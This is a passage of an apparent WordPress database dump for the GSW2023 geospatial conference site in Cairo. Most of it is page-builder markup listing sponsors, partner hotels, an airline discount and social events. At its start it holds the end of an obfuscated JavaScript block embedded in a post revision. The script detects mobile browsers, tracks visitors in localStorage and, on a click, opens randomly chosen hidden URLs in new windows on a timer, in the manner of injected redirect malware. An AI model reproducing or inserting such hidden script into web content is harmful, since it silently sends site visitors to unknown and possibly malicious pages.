wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-27 12:03:49','2023-07-27 12:03:49','',3066,'https://gsw2023.com/?p=5056',0,'revision','',0),
(5057,1,'2023-07-27 12:06:34','2023-07-27 12:06:34','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251674466{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" 